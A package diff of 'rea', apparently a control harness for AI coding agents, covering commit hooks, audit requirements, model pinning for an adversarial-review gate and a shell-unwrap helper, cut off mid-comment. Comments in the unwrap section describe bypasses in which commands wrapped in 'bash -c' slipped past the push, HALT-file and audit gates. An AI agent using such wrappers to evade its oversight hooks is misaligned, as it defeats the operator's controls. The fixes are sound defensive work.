@bookedsolid/rea 0.16.4 → 0.18.0

package/.husky/commit-msg CHANGED
@@ -78,9 +78,17 @@ BLOCKED=0
78
78
  MATCHES=""
79
79
 
80
80
  # Pattern 1: Co-Authored-By with noreply@ email
81
- if grep -qiE 'Co-Authored-By:.*noreply@' "$COMMIT_MSG_FILE" 2>/dev/null; then
81
+ # 0.18.0 helix-020 / discord-ops Round 10 #3 fix (G4.B):
82
+ # the pre-fix pattern `Co-Authored-By:.*noreply@` matched both AI-tool
83
+ # noreply addresses AND legitimate `<user>@users.noreply.github.com`
84
+ # collaborator credits — blocking honest co-author footers from human
85
+ # contributors. Refined to enumerate AI-tool noreply domains explicitly;
86
+ # Pattern 2 below catches Co-Authored-By with named tools regardless of
87
+ # email, so dropping users.noreply.github.com from this branch only
88
+ # relaxes the check for human collaborators — never for AI.
89
+ if grep -qiE 'Co-Authored-By:.*noreply@(anthropic\.com|openai\.com|github-copilot|github\.com|claude\.ai|chatgpt\.com|googlemail\.com|google\.com|cursor\.com|codeium\.com|tabnine\.com|amazon\.com|amazonaws\.com|amazon-q\.amazonaws\.com|cody\.dev|sourcegraph\.com)' "$COMMIT_MSG_FILE" 2>/dev/null; then
82
90
  BLOCKED=1
83
- MATCHES="${MATCHES}$(grep -niE 'Co-Authored-By:.*noreply@' "$COMMIT_MSG_FILE" 2>/dev/null)
91
+ MATCHES="${MATCHES}$(grep -niE 'Co-Authored-By:.*noreply@(anthropic\.com|openai\.com|github-copilot|github\.com|claude\.ai|chatgpt\.com|googlemail\.com|google\.com|cursor\.com|codeium\.com|tabnine\.com|amazon\.com|amazonaws\.com|amazon-q\.amazonaws\.com|cody\.dev|sourcegraph\.com)' "$COMMIT_MSG_FILE" 2>/dev/null)
84
92
  "
85
93
  fi
86
94
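As a rough illustration of the narrowed Pattern 1 in the hunk above, the sketch below ports a shortened form of the `grep -qiE` expression to a JavaScript `RegExp` and runs it against three sample footers. The function name `isAiNoreplyFooter`, the trimmed domain list, and the sample addresses are assumptions made for illustration and are not part of the hook; `grep -E` and JavaScript regular expressions also differ in edge cases this sketch does not cover.

```javascript
// Hypothetical port of the hook's Pattern 1. The domain list is a shortened
// subset of the alternation shown in the diff above.
const AI_NOREPLY =
  /Co-Authored-By:.*noreply@(anthropic\.com|openai\.com|github\.com|cursor\.com)/i;

// Returns true when a commit-message line would trip the narrowed pattern.
function isAiNoreplyFooter(line) {
  return AI_NOREPLY.test(line);
}

// Sample footers (invented for this sketch).
const samples = [
  'Co-Authored-By: Claude <noreply@anthropic.com>',
  'co-authored-by: Some Bot <noreply@github.com>',
  'Co-Authored-By: Jane Doe <1234567+jane@users.noreply.github.com>',
];

for (const line of samples) {
  console.log(isAiNoreplyFooter(line) ? 'BLOCKED' : 'allowed', '|', line);
}
```

The third footer is allowed because `noreply` is followed by `.github.com` rather than `@`, so the enumerated `noreply@<domain>` alternation never applies to it.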
 
@@ -32,13 +32,18 @@ You may read additional files in the repo if needed for context, but do so read-
32
32
  1. **Check HALT and policy** — read `.rea/policy.yaml`, check `.rea/HALT`. If frozen, stop immediately.
33
33
  2. **Validate Codex availability** — if `/codex` is not installed, report and stop. Do not silently fall back to another reviewer.
34
34
  3. **Prepare the Codex invocation** — construct the adversarial-review prompt with the diff, commit log, and any relevant context files.
35
- 4. **Invoke `/codex:adversarial-review`** — this call flows through the REA middleware chain (audit → kill-switch → tier → policy → redact → injection → execute → result-size-cap).
35
+ 4. **Invoke `/codex:adversarial-review --model gpt-5.4`** — pass the `--model` flag explicitly to pin the iron-gate model regardless of plugin defaults or `~/.codex/config.toml` resolution. The codex-companion script accepts `--model` (see `codex-companion.mjs:684`). This call flows through the REA middleware chain (audit → kill-switch → tier → policy → redact → injection → execute → result-size-cap).
36
36
 
37
37
  **Model pinning (0.16.1+):** when the codex plugin's adversarial-review supports model overrides, request `gpt-5.4` with `model_reasoning_effort: high` to match the push-gate's iron-gate defaults. Pre-0.16.1, in-session adversarial reviews ran on whatever the plugin defaulted to (likely `codex-auto-review` at medium reasoning) — meaningfully WEAKER than the push-gate's `gpt-5.4` + `high`. This caused a "in-session review passes, push-gate review fails" pattern reported by helix across 014 / 015 / 016. If the plugin call accepts model parameters, pass them. If it does not, fall back to invoking `codex exec review --base <ref> --json --ephemeral -c model="gpt-5.4" -c model_reasoning_effort="high"` directly via `Bash` — same shape the push-gate uses (see `src/hooks/push-gate/codex-runner.ts::runCodexReview`). The cost of the stronger model is small relative to the cost of shipping a release with a P1 bypass that gets caught at consumer push time.
38
38
  5. **Parse the Codex output** — extract structured findings.
39
39
  6. **Classify findings** by category: security, correctness, edge cases, test gaps, API design, performance.
40
40
  7. **Assign verdict**: `pass` (no material findings), `concerns` (findings worth addressing but not blocking), `blocking` (findings that must be fixed before merge).
41
- 8. **Emit an audit entry — REQUIRED** for every `/codex-review` invocation. The pre-push gate does not consult audit records to decide pass/fail (post-0.11.0 the gate is stateless), but the `/codex-review` slash command's Step 3 verifies an audit entry was appended for this run and surfaces "review never happened" to the user when one is missing. The two specs are a contract pair — audit emission is what tells the operator their interactive review actually completed. Append via the public `@bookedsolid/rea/audit` helper:
41
+ 8. **Emit an audit entry — REQUIRED** for every `/codex-review` invocation. This is one of three identical contract checkpoints:
42
+ - The runtime always emits (`src/hooks/push-gate/index.ts` calls `appendAuditRecord` via `safeAppend` on every completed review — see `EVT_REVIEWED`).
43
+ - This agent always emits (this step).
44
+ - The `/codex-review` slash command's Step 3 verifies the entry exists and surfaces "review never happened" as a failure if it does not.
45
+
46
+ The pre-push gate does not consult audit records to decide pass/fail (post-0.11.0 the gate is stateless), but the audit record is still the operator's only forensic trail for an interactive review. Without it, "did this review actually happen" becomes unanswerable. Reconciled in 0.18.0 (helixir Finding #6 across cycles 1–7) so the three documents — `commands/codex-review.md`, `agents/codex-adversarial.md`, `src/hooks/push-gate/index.ts` — describe the same contract in identical wording. Append via the public `@bookedsolid/rea/audit` helper:
42
47
 
43
48
  ```ts
44
49
  import { appendAuditRecord, CODEX_REVIEW_TOOL_NAME, CODEX_REVIEW_SERVER_NAME, Tier, InvocationStatus } from '@bookedsolid/rea/audit';
@@ -55,17 +55,21 @@ Invoke the `codex-adversarial` agent with:
55
55
 
56
56
  The agent wraps `/codex:adversarial-review` and returns structured findings.
57
57
 
58
- ## Step 3 — (Optional) verify audit entry
58
+ ## Step 3 — Verify audit entry — REQUIRED
59
59
 
60
- Audit emission is **optional** in 0.11.0+. The pre-push gate is stateless and does not consult audit records to decide pass/fail; the agent's structured findings ARE the review. The agent will append an audit entry when it helps forensic traceability (intermittent verdicts, review-history audits) but its absence is not a failure.
60
+ The `codex-adversarial` agent **MUST** emit an audit entry for every invocation. This is the same contract documented in `agents/codex-adversarial.md` Step 4 and matches the runtime behavior of `rea hook push-gate` (which always calls `appendAuditRecord` on a completed review; see `src/hooks/push-gate/index.ts`'s `EVT_REVIEWED` path).
61
61
 
62
- If you want to confirm an entry was written for this run:
62
+ Verify the entry was written:
63
63
 
64
64
  ```bash
65
65
  tail -n 1 .rea/audit.jsonl
66
66
  ```
67
67
 
68
- A `codex-adversarial-review` entry with `head_sha`, `target`, `finding_count`, and `verdict` fields is informative but DO NOT treat its absence as a failure. The review happened if the agent returned text. (Pre-0.15.0 this step was a hard verification gate that contradicted the agent's "audit optional" contract — see Helix Finding 3, 2026-05-03.)
68
+ The expected entry has `tool_name: "codex.review"`, `server_name: "codex"`, and `metadata` containing `head_sha`, `target`, `finding_count`, and `verdict`. If the entry is missing, the review **did not complete its contract**; surface that to the user as a failure.
69
+
70
+ **Why audit emission is required even though the pre-push gate is stateless:** the 0.11.0 push-gate decides pass/fail on Codex's live verdict, not on a receipt in the audit log — but the audit record is still the operator's only forensic trail for an interactive `/codex-review` run. Without it, "did this review actually happen" becomes unanswerable, which is exactly the failure mode helixir flagged across rounds 65/66/73 in the 0.13–0.17 cycle. Runtime always emits; the agent always emits; the slash command verifies. Three checkpoints, one contract.
71
+
72
+ (Earlier docs in 0.15+ said this step was "optional"; that wording contradicted both the agent's Step 4 and the runtime behavior of `safeAppend` in `src/hooks/push-gate/index.ts`. Reconciled in 0.18.0 — helixir Finding #6 across cycles 1–7.)
69
73
 
70
74
  ## Step 4 — Report
71
75
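The Step 3 check in the hunk above (inspect the last line of `.rea/audit.jsonl` for the expected fields) could be automated along these lines. This is a minimal sketch: the field names come from the Step 3 text, while the function name `isCodexReviewEntry` and the sample record are hypothetical, and the real audit record may carry more fields than are checked here.

```javascript
// Hypothetical checker for the last non-empty line of an audit JSONL file.
// It takes the file contents as a string so the sketch needs no file access.
function isCodexReviewEntry(jsonlText) {
  const lines = jsonlText.split('\n').filter((l) => l.trim().length > 0);
  if (lines.length === 0) return false;

  let entry;
  try {
    entry = JSON.parse(lines[lines.length - 1]);
  } catch {
    return false; // a malformed last line is treated as "no entry"
  }

  if (entry === null || typeof entry !== 'object') return false;
  if (entry.tool_name !== 'codex.review' || entry.server_name !== 'codex') return false;

  const meta = entry.metadata;
  if (meta === null || typeof meta !== 'object') return false;
  return ['head_sha', 'target', 'finding_count', 'verdict'].every((k) => k in meta);
}

// Invented sample record, shaped after the fields listed in Step 3.
const sample = JSON.stringify({
  tool_name: 'codex.review',
  server_name: 'codex',
  metadata: { head_sha: 'abc123', target: 'main', finding_count: 0, verdict: 'pass' },
});

console.log(isCodexReviewEntry(sample + '\n')); // true
console.log(isCodexReviewEntry('')); // false
```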
 
package/dist/cli/init.js CHANGED
@@ -233,10 +233,28 @@ async function printCodexInstallAssist() {
233
233
  console.log(' Install via the Claude Code Codex plugin helper: `/codex:setup`,');
234
234
  console.log(' or set `review.codex_required: false` in .rea/policy.yaml to opt out.');
235
235
  }
236
+ function readExistingInstalledAt(policyPath) {
237
+ try {
238
+ if (!fs.existsSync(policyPath))
239
+ return undefined;
240
+ const raw = fs.readFileSync(policyPath, 'utf8');
241
+ const m = raw.match(/^installed_at:\s*"([^"]+)"\s*$/m);
242
+ return m ? m[1] : undefined;
243
+ }
244
+ catch {
245
+ return undefined;
246
+ }
247
+ }
236
248
  function writePolicyYaml(targetDir, config, layered) {
237
249
  const policyPath = path.join(targetDir, REA_DIR, POLICY_FILE);
238
250
  const installedBy = process.env.USER ?? os.userInfo().username ?? 'unknown';
239
- const installedAt = new Date().toISOString();
251
+ // 0.17.0 idempotency: preserve the original `installed_at` if a policy
252
+ // already exists. Without this, every `rea init` re-stamps the field
253
+ // and produces a non-idempotent diff. The first install date is the
254
+ // semantically correct value — re-runs reflect refreshes, not new
255
+ // installs. Falls back to `new Date()` only when the file is absent
256
+ // or unparseable.
257
+ const installedAt = readExistingInstalledAt(policyPath) ?? new Date().toISOString();
240
258
  const lines = [];
241
259
  lines.push(`# .rea/policy.yaml — managed by rea v${getPkgVersion()}`);
242
260
  lines.push(`# Edit carefully: tightening takes effect on next load; loosening requires human approval.`);
@@ -349,14 +367,36 @@ async function writeInstallManifest(targetDir, profile, fragmentInput) {
349
367
  sha256: sha256OfBuffer(buildFragment(fragmentInput)),
350
368
  source: 'claude-md',
351
369
  });
370
+ // 0.17.0 idempotency: preserve the original `installed_at` from a
371
+ // prior manifest if present. The first install date is the semantic
372
+ // truth — re-runs reflect refreshes, not new installs.
373
+ const manifestPath = path.join(targetDir, REA_DIR, 'install-manifest.json');
352
374
  const manifest = {
353
375
  version: getPkgVersion(),
354
376
  profile,
355
- installed_at: new Date().toISOString(),
377
+ installed_at: readExistingManifestInstalledAt(manifestPath) ?? new Date().toISOString(),
356
378
  files: entries,
357
379
  };
358
380
  return writeManifestAtomic(targetDir, manifest);
359
381
  }
382
+ function readExistingManifestInstalledAt(manifestPath) {
383
+ try {
384
+ if (!fs.existsSync(manifestPath))
385
+ return undefined;
386
+ const raw = fs.readFileSync(manifestPath, 'utf8');
387
+ const parsed = JSON.parse(raw);
388
+ if (typeof parsed === 'object' &&
389
+ parsed !== null &&
390
+ 'installed_at' in parsed &&
391
+ typeof parsed.installed_at === 'string') {
392
+ return parsed.installed_at;
393
+ }
394
+ }
395
+ catch {
396
+ // Fall through — caller stamps a fresh date.
397
+ }
398
+ return undefined;
399
+ }
360
400
  export async function runInit(options) {
361
401
  const targetDir = process.cwd();
362
402
  const reagentPolicyPath = detectReagentPolicy(targetDir);
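To make the idempotency fix in this hunk concrete, here is a small sketch that applies the same `installed_at` regex to in-memory policy text instead of a file. The helper names `extractInstalledAt` and `resolveInstalledAt`, the `profile` line, and the timestamps are assumptions for illustration only.

```javascript
// Same regex as readExistingInstalledAt in the diff; everything else in this
// sketch (helper names, sample values) is hypothetical.
function extractInstalledAt(policyText) {
  const m = policyText.match(/^installed_at:\s*"([^"]+)"\s*$/m);
  return m ? m[1] : undefined;
}

// Prefer the stamp found in an existing policy, else use the current time.
function resolveInstalledAt(existingPolicyText, now) {
  const previous =
    existingPolicyText === undefined ? undefined : extractInstalledAt(existingPolicyText);
  return previous ?? now;
}

// First run: no policy exists yet, so the fresh timestamp is used.
const firstRun = resolveInstalledAt(undefined, '2026-01-01T00:00:00.000Z');

// Second run: the policy written by the first run is read back.
const policy = `profile: "example"\ninstalled_at: "${firstRun}"\n`;
const secondRun = resolveInstalledAt(policy, '2026-02-02T00:00:00.000Z');

console.log(firstRun === secondRun); // true: the re-run keeps the first stamp
```

Because the regex only accepts a double-quoted value, an unquoted `installed_at:` line would not match and the caller would stamp a fresh date.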
@@ -635,7 +635,22 @@ export async function runUpgrade(options = {}) {
635
635
  }
636
636
  const now = new Date().toISOString();
637
637
  const installedAt = existingManifest?.installed_at ?? now;
638
- const profile = existingManifest?.profile ?? 'unknown';
638
+ // 0.18.0 helix-020 G6 fix: pre-fix the upgrade path read profile from
639
+ // the existing manifest only — and pre-0.2.0 manifests recorded
640
+ // `"unknown"` as a placeholder. Every subsequent `rea upgrade` then
641
+ // re-stamped `"unknown"` forever. Authoritative source for the
642
+ // profile is `.rea/policy.yaml`; the manifest is a derivative
643
+ // record. Read policy first; fall back to existing manifest only
644
+ // when policy load fails (covers the bootstrap case where the
645
+ // manifest exists but policy is malformed).
646
+ let profile;
647
+ try {
648
+ const livePolicy = loadPolicy(resolvedRoot);
649
+ profile = livePolicy.profile;
650
+ }
651
+ catch {
652
+ profile = existingManifest?.profile ?? 'unknown';
653
+ }
639
654
  const freshManifest = {
640
655
  version: getPkgVersion(),
641
656
  profile,
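The policy-first, manifest-second lookup described in the comment above can be exercised in isolation. The sketch below injects the loader as a function so it runs without the real `loadPolicy`; `resolveProfile`, the sample profile names, and the fake loaders are hypothetical.

```javascript
// `loadPolicy` is passed in so the sketch does not depend on the rea loader.
function resolveProfile(loadPolicy, existingManifest) {
  try {
    return loadPolicy().profile; // policy is the authoritative source
  } catch {
    return existingManifest?.profile ?? 'unknown'; // manifest is the fallback
  }
}

// A manifest that recorded the placeholder value.
const staleManifest = { profile: 'unknown' };

const fromPolicy = resolveProfile(() => ({ profile: 'example-profile' }), staleManifest);
const fromManifest = resolveProfile(() => {
  throw new Error('malformed policy');
}, { profile: 'manifest-profile' });
const noSources = resolveProfile(() => {
  throw new Error('malformed policy');
}, undefined);

console.log(fromPolicy, fromManifest, noSources);
```

With a readable policy, the stale `"unknown"` in the manifest no longer wins; it is consulted only when the policy load throws.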
@@ -136,18 +136,29 @@ function escapeTomlString(value) {
136
136
  */
137
137
  export async function runCodexReview(options) {
138
138
  const spawner = options.spawnImpl ?? spawn;
139
+ // 0.18.0 iron-gate runtime default: ALWAYS pass model + reasoning
140
+ // effort to codex. Pre-fix, undefined options fell back to codex's
141
+ // own default (`codex-auto-review` at medium reasoning), which
142
+ // bypassed the iron-gate intent and let weaker reviews ship. Now
143
+ // the runtime hardcodes `gpt-5.4` + `high` as the floor; policy
144
+ // can OVERRIDE to a different model/effort but cannot opt out into
145
+ // codex's defaults (config.toml or otherwise). The user's directive
146
+ // — "we want codex to be using its BEST. EVERY TIME" — is enforced
147
+ // here, not at the policy layer.
148
+ //
139
149
  // Model + reasoning overrides go BEFORE the `exec` subcommand because
140
150
  // `-c key=value` is a top-level codex CLI flag, not an `exec` flag.
141
151
  // Codex's TOML parser interprets the value, so we wrap strings in TOML
142
152
  // quotes — `-c model="gpt-5.4"` not `-c model=gpt-5.4` — to ensure the
143
153
  // value lands as a string regardless of upstream parsing changes.
144
- const overrideArgs = [];
145
- if (options.model !== undefined && options.model.length > 0) {
146
- overrideArgs.push('-c', `model="${escapeTomlString(options.model)}"`);
147
- }
148
- if (options.reasoningEffort !== undefined) {
149
- overrideArgs.push('-c', `model_reasoning_effort="${escapeTomlString(options.reasoningEffort)}"`);
150
- }
154
+ const effectiveModel = options.model !== undefined && options.model.length > 0 ? options.model : 'gpt-5.4';
155
+ const effectiveReasoning = options.reasoningEffort ?? 'high';
156
+ const overrideArgs = [
157
+ '-c',
158
+ `model="${escapeTomlString(effectiveModel)}"`,
159
+ '-c',
160
+ `model_reasoning_effort="${escapeTomlString(effectiveReasoning)}"`,
161
+ ];
151
162
  const baseArgs = [
152
163
  ...overrideArgs,
153
164
  'exec',
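A standalone sketch of the default resolution in this hunk follows. The body of `escapeTomlString` is not shown in the diff, so the version here (escaping backslashes and double quotes) is an assumption, as are the function name `buildOverrideArgs` and the `example-model` value.

```javascript
// Stand-in for the real escapeTomlString, whose body is not part of this
// diff. Escaping only backslashes and double quotes is an assumption.
function escapeTomlString(value) {
  return value.replace(/\\/g, '\\\\').replace(/"/g, '\\"');
}

// Mirrors the 0.18.0 logic: unset or empty values fall back to the floor.
function buildOverrideArgs(options = {}) {
  const model =
    options.model !== undefined && options.model.length > 0 ? options.model : 'gpt-5.4';
  const effort = options.reasoningEffort ?? 'high';
  return [
    '-c',
    `model="${escapeTomlString(model)}"`,
    '-c',
    `model_reasoning_effort="${escapeTomlString(effort)}"`,
  ];
}

console.log(buildOverrideArgs().join(' '));
console.log(buildOverrideArgs({ model: '', reasoningEffort: 'medium' }).join(' '));
console.log(buildOverrideArgs({ model: 'example-model' }).join(' '));
```

In every case both `-c` pairs are emitted, which is the point of the change: the arguments are never omitted, so codex's own defaults are not reached through this path.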
@@ -11,6 +11,7 @@ declare const PolicySchema: z.ZodObject<{
11
11
  promotion_requires_human_approval: z.ZodBoolean;
12
12
  block_ai_attribution: z.ZodDefault<z.ZodBoolean>;
13
13
  blocked_paths: z.ZodArray<z.ZodString, "many">;
14
+ protected_writes: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
14
15
  protected_paths_relax: z.ZodDefault<z.ZodArray<z.ZodString, "many">>;
15
16
  notification_channel: z.ZodDefault<z.ZodString>;
16
17
  injection_detection: z.ZodOptional<z.ZodEnum<["block", "warn"]>>;
@@ -47,10 +48,14 @@ declare const PolicySchema: z.ZodObject<{
47
48
  */
48
49
  auto_narrow_threshold: z.ZodOptional<z.ZodNumber>;
49
50
  /**
50
- * Codex CLI model override (0.13.4+). Pinned via `-c model="<name>"` on
51
- * every `codex exec review` invocation. When unset, codex's own default
52
- * applies, which today is the special-purpose `codex-auto-review`
53
- * model at `medium` reasoning, NOT the flagship.
51
+ * Codex CLI model override (0.13.4+; runtime-default since 0.18.0).
52
+ * Pinned via `-c model="<name>"` on every `codex exec review`
53
+ * invocation. **0.18.0 iron-gate runtime default**: when unset, the
54
+ * runtime hardcodes `gpt-5.4`; codex's own default
55
+ * (`codex-auto-review` at medium) is no longer reachable through the
56
+ * rea push-gate. To select a different model, set this key
57
+ * explicitly. config.toml is consulted ONLY when the explicit value
58
+ * passed by rea is `undefined`, which the runtime never does.
54
59
  *
55
60
  * For serious adversarial review on consumer codebases (where verdict
56
61
  * stability matters) the recommended setting is `gpt-5.4` with
@@ -174,6 +179,7 @@ declare const PolicySchema: z.ZodObject<{
174
179
  blocked_paths: string[];
175
180
  protected_paths_relax: string[];
176
181
  notification_channel: string;
182
+ protected_writes?: string[] | undefined;
177
183
  injection_detection?: "block" | "warn" | undefined;
178
184
  injection?: {
179
185
  suspicious_blocks_writes?: boolean | undefined;
@@ -220,6 +226,7 @@ declare const PolicySchema: z.ZodObject<{
220
226
  promotion_requires_human_approval: boolean;
221
227
  blocked_paths: string[];
222
228
  block_ai_attribution?: boolean | undefined;
229
+ protected_writes?: string[] | undefined;
223
230
  protected_paths_relax?: string[] | undefined;
224
231
  notification_channel?: string | undefined;
225
232
  injection_detection?: "block" | "warn" | undefined;
@@ -39,10 +39,14 @@ const ReviewPolicySchema = z
39
39
  */
40
40
  auto_narrow_threshold: z.number().int().nonnegative().optional(),
41
41
  /**
42
- * Codex CLI model override (0.13.4+). Pinned via `-c model="<name>"` on
43
- * every `codex exec review` invocation. When unset, codex's own default
44
- * applies, which today is the special-purpose `codex-auto-review`
45
- * model at `medium` reasoning, NOT the flagship.
42
+ * Codex CLI model override (0.13.4+; runtime-default since 0.18.0).
43
+ * Pinned via `-c model="<name>"` on every `codex exec review`
44
+ * invocation. **0.18.0 iron-gate runtime default**: when unset, the
45
+ * runtime hardcodes `gpt-5.4`; codex's own default
46
+ * (`codex-auto-review` at medium) is no longer reachable through the
47
+ * rea push-gate. To select a different model, set this key
48
+ * explicitly. config.toml is consulted ONLY when the explicit value
49
+ * passed by rea is `undefined`, which the runtime never does.
46
50
  *
47
51
  * For serious adversarial review on consumer codebases (where verdict
48
52
  * stability matters) the recommended setting is `gpt-5.4` with
@@ -160,11 +164,19 @@ const PolicySchema = z
160
164
  promotion_requires_human_approval: z.boolean(),
161
165
  block_ai_attribution: z.boolean().default(false),
162
166
  blocked_paths: z.array(z.string()),
163
- // 0.16.3 F7: opt-in relax list. Consumers can list rea-managed
164
- // hard-protected patterns they want unblocked (e.g. `.husky/` to
165
- // author their own husky hooks). The kill-switch invariants
166
- // (`.rea/HALT`, `.rea/policy.yaml`, `.claude/settings.json`) are
167
- // ignored if listed; see hooks/_lib/protected-paths.sh.
167
+ // 0.16.5 F9 (helix-018 Option A): full policy-driven definition of
168
+ // the rea-managed write-protection list. When set, fully owns the
169
+ // protected set (kill-switch invariants are always added). When
170
+ // unset, defaults to the 5 historical patterns. Consumers who want
171
+ // to ADD a path (e.g. `.github/workflows/`) or remove non-invariant
172
+ // entries (e.g. `.husky/`) declare the full list here.
173
+ protected_writes: z.array(z.string()).optional(),
174
+ // 0.16.3 F7: opt-in subtractor. Removes entries from whatever the
175
+ // effective protected set is (default OR `protected_writes`).
176
+ // Kill-switch invariants (`.rea/HALT`, `.rea/policy.yaml`,
177
+ // `.claude/settings.json`) are silently dropped from the relax
178
+ // list — see hooks/_lib/protected-paths.sh. Both keys can coexist;
179
+ // `protected_paths_relax` runs AFTER `protected_writes`.
168
180
  protected_paths_relax: z.array(z.string()).default([]),
169
181
  notification_channel: z.string().default(''),
170
182
  injection_detection: z.enum(['block', 'warn']).optional(),
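One way to read the interaction between `protected_writes` and `protected_paths_relax` described in the schema comments above is sketched here. This is a guess at the semantics rather than the hook's implementation, which lives in shell and is not part of this hunk: exact string matching, the function name `effectiveProtectedSet`, and the `defaults` parameter are assumptions. The five historical default patterns are not listed in the diff, so the caller supplies them.

```javascript
// Kill-switch invariants named in the schema comment above.
const INVARIANTS = ['.rea/HALT', '.rea/policy.yaml', '.claude/settings.json'];

// `defaults` is a parameter because the diff does not list the historical
// patterns. Exact string matching is an assumption of this sketch.
function effectiveProtectedSet({ protectedWrites, protectedPathsRelax = [] }, defaults) {
  // When protected_writes is set it fully owns the base list.
  const base = protectedWrites ?? defaults;
  // Invariants listed in the relax list are silently dropped from it.
  const relax = new Set(protectedPathsRelax.filter((p) => !INVARIANTS.includes(p)));
  // The relax list runs after protected_writes.
  const kept = base.filter((p) => !relax.has(p));
  // Invariants are always present in the result.
  return [...new Set([...kept, ...INVARIANTS])];
}

const result = effectiveProtectedSet(
  {
    protectedWrites: ['.husky/', '.github/workflows/'],
    protectedPathsRelax: ['.husky/', '.rea/HALT'],
  },
  ['.example-default/'], // placeholder, not the real default list
);

console.log(result);
```

Here `.husky/` is removed by the relax list, while the attempt to relax `.rea/HALT` has no effect.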
@@ -26,6 +26,7 @@ export declare const ProfileSchema: z.ZodObject<{
26
26
  promotion_requires_human_approval: z.ZodOptional<z.ZodBoolean>;
27
27
  block_ai_attribution: z.ZodOptional<z.ZodBoolean>;
28
28
  blocked_paths: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
29
+ protected_writes: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
29
30
  protected_paths_relax: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
30
31
  notification_channel: z.ZodOptional<z.ZodString>;
31
32
  injection_detection: z.ZodOptional<z.ZodEnum<["block", "warn"]>>;
@@ -52,6 +53,7 @@ export declare const ProfileSchema: z.ZodObject<{
52
53
  promotion_requires_human_approval?: boolean | undefined;
53
54
  block_ai_attribution?: boolean | undefined;
54
55
  blocked_paths?: string[] | undefined;
56
+ protected_writes?: string[] | undefined;
55
57
  protected_paths_relax?: string[] | undefined;
56
58
  notification_channel?: string | undefined;
57
59
  injection_detection?: "block" | "warn" | undefined;
@@ -68,6 +70,7 @@ export declare const ProfileSchema: z.ZodObject<{
68
70
  promotion_requires_human_approval?: boolean | undefined;
69
71
  block_ai_attribution?: boolean | undefined;
70
72
  blocked_paths?: string[] | undefined;
73
+ protected_writes?: string[] | undefined;
71
74
  protected_paths_relax?: string[] | undefined;
72
75
  notification_channel?: string | undefined;
73
76
  injection_detection?: "block" | "warn" | undefined;
@@ -48,6 +48,7 @@ export const ProfileSchema = z
48
48
  promotion_requires_human_approval: z.boolean().optional(),
49
49
  block_ai_attribution: z.boolean().optional(),
50
50
  blocked_paths: z.array(z.string()).optional(),
51
+ protected_writes: z.array(z.string()).optional(),
51
52
  protected_paths_relax: z.array(z.string()).optional(),
52
53
  notification_channel: z.string().optional(),
53
54
  injection_detection: z.enum(['block', 'warn']).optional(),
@@ -268,6 +268,7 @@ export interface Policy {
268
268
  promotion_requires_human_approval: boolean;
269
269
  block_ai_attribution: boolean;
270
270
  blocked_paths: string[];
271
+ protected_writes?: string[];
271
272
  protected_paths_relax: string[];
272
273
  notification_channel: string;
273
274
  injection_detection?: 'block' | 'warn';
@@ -51,6 +51,214 @@
51
51
  # do NOT honor `\` escapes; double-quoted spans treat `\"` as a literal
52
52
  # `"` and skip past it.
53
53
 
54
+ # Unwrap nested shell wrappers — `bash -c 'PAYLOAD'`, `sh -lc "PAYLOAD"`,
55
+ # `zsh -ic 'PAYLOAD'`, etc. Emits the input string AS-IS plus each inner
56
+ # PAYLOAD as a separate line. Pre-0.17.0 the splitter never parsed
57
+ # inside wrapped quotes, so `bash -c 'git push --force'` produced a
58
+ # single segment whose first token was `bash` — defeating every check
59
+ # that uses `any_segment_starts_with`. This helper makes the inner
60
+ # payload visible as its own segment, so every existing detection rule
61
+ # fires uniformly on wrapped and unwrapped commands.
62
+ #
63
+ # Closes helix-017 #1, #2, #3 (0.16.2):
64
+ # - `bash -lc 'git push --force origin HEAD'` → payload now seen by H1
65
+ # - `bash -c 'printf x > .rea/HALT'` → payload now seen by bash-gate
66
+ # - `bash -lc 'npm install some-package'` → payload now seen by audit-gate
67
+ #
68
+ # Recognized wrapper shape (case-insensitive shell name):
69
+ # (bash|sh|zsh|dash|ksh) [optional -flags...] (-c|-lc|-lic|-ic|-cl|-cli) (QUOTED_ARG)
70
+ #
71
+ # QUOTED_ARG can be single- or double-quoted. Single-quote bodies have no
72
+ # escape semantics. Double-quote bodies treat \" and \\ as literal
73
+ # escapes (per POSIX). Multiple wrappers per command-line are handled
74
+ # (e.g. `foo; bash -c 'bar' && sh -c 'baz'` emits both `bar` and `baz`).
75
+ #
76
+ # 0.18.0 helix-020 G1.A fix: the unwrap pass scans a QUOTE-MASKED form
77
+ # of the input, not the raw input. Pre-fix, a quoted argument that
78
+ # MENTIONED a wrapper (e.g. `git commit -m "docs: mention bash -c 'npm
79
+ # install left-pad'"`) would emit a phantom inner-payload segment, and
80
+ # `dependency-audit-gate.sh` would block the innocent commit. The
81
+ # quote-mask layer (the same one `_rea_split_segments` uses) replaces
82
+ # all in-quote separators AND in-quote single/double quote characters
83
+ # with multi-byte sentinels — so the wrapper regex can no longer match
84
+ # inside an outer quoted span. The unwrapped payload itself is still
85
+ # emitted from the un-masked input by recomputing offsets back to the
86
+ # raw string, so escape semantics inside legitimate wrappers stay
87
+ # correct. We only need the mask to suppress matching; the captured
88
+ # payload is read off the original string.
89
+ #
90
+ # Limitation: ONE level of unwrapping. A wrapper inside a wrapper
91
+ # (`bash -c "bash -c 'innermost'"`) emits only the second-level payload
92
+ # (`bash -c 'innermost'`), not the third-level. This is enough for
93
+ # every consumer-reported bypass; deeper nesting can be added later
94
+ # without changing the contract.
95
+ _rea_unwrap_nested_shells() {
96
+ local cmd="$1"
97
+ printf '%s\n' "$cmd"
98
+ # Build a mask where in-quote `"` `'` `;` `&` `|` characters are
99
+ # replaced with multi-byte sentinels so the wrapper regex below
100
+ # cannot match wrapper syntax that lives inside outer quoted prose.
101
+ # We also mask the in-quote QUOTE characters themselves so the awk
102
+ # body's quote-state heuristic (which looks at the byte immediately
103
+ # after the matched wrapper-prefix region) cannot mistake an inner
104
+ # quote for a payload-opening quote. Sentinel bytes are aligned to
105
+ # be the same width as their original character (single-byte) so
106
+ # offsets into the raw string remain valid for payload extraction.
107
+ #
108
+ # Approach: rather than synthesize a per-byte sentinel of width 1,
109
+ # we run the awk wrapper-scan against a SEPARATE masked stream and
110
+ # then translate matched RSTART/RLENGTH offsets back to the original
111
+ # string. We do that by passing both strings into awk (raw via stdin,
112
+ # masked via -v MASKED) and tracking the same index across both —
113
+ # since the mask substitutes single bytes with single bytes only
114
+ # (placeholder bytes drawn from the C0 control-character range) the
115
+ # offsets line up.
116
+ #
117
+ # Placeholder bytes — chosen from the C0 control range so they
118
